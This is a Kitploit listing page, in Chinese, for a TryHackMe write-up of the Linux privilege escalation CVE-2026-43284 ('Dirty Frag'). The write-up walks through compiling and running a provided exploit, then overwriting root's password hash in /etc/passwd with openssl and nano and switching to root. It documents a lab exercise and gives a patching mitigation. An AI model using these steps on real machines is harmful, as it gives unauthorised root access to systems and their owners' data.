Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-43284---DirtyFrag-Analysis-THM- — TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup | Kitploit
工具/GitHubGitHub/revyhub/cve-2026-43284---dirtyfrag-analysis-thm-
Privilege EscalationVulnerability AnalysisExploitationCTFLearning & EducationLabs & Practice
GitHubrevyhub/cve-2026-43284---dirtyfrag-analysis-thm-

CVE-2026-43284---DirtyFrag-Analysis-THM-

TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
118天前尚未审核

TryHackMe — CVE-2026-43284: Dirty Frag

房间: CVE-2026-43284: Dirty Frag 类别: Linux 权限提升 作者: (我的主页)

概述

Dirty Frag 是一个围绕 CVE-2026-43284 构建的连环 Linux 本地权限提升(LPE)房间。目标是通过利用提供的概念验证漏洞利用,从非特权 shell 提升到 root。

初始枚举

列出工作目录可以找到该漏洞利用提供的文件:

root@kitploit:~
$ ls
README.txt
exp
exp.c
  • exp.c — 漏洞利用源代码
  • exp — 预编译二进制文件(可能与目标环境不匹配)
  • README.txt — 漏洞利用附带的使用说明

构建漏洞利用

由于提供的 exp 二进制文件可能与目标的精确环境不兼容,更安全的做法是从源代码重新构建:

root@kitploit:~
$ gcc -O0 -Wall -o exp exp.c -lutil
  • -O0 禁用编译器优化,使行为可预测且与源代码一致
  • -Wall 启用编译器警告,有助于检查构建是否正确
  • -lutil 链接 libutil —— 当代码使用伪终端(pty)函数时通常需要

触发漏洞

root@kitploit:~
$ ./exp

运行编译后的漏洞利用会触发底层缺陷,从而获得对一个文件的写权限,而该文件通常对非特权用户应为只读——此处即 /etc/passwd。

提权到 Root

获得写权限后,为 root 生成一个新的密码哈希:

root@kitploit:~
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..

该哈希被写入 /etc/passwd,替换 root 现有的哈希字段:

root@kitploit:~
$ nano /etc/passwd

现在已知 root 的密码,切换用户就很简单了:

root@kitploit:~
$ su root

获取 Flag

root@kitploit:~
$ cat /root/flag.txt
THM{REDACTED}

经验教训

  • (最初理解大约花了 30 多分钟,但一旦我明白后,我可以重复地多次利用同一个漏洞利用)
  • (内部的 root 代码很奇怪,你无法选择和直接使用基础控件,而必须使用方向键导航到 root❌ 并将 X 改为你创建的哈希)

缓解措施

  • 保持内核/系统软件包已修补并更新到最新。

本文记录了一个已完成的 TryHackMe 房间,仅供教育目的。目标环境是 TryHackMe 提供的一台故意存在漏洞的机器。

下载工具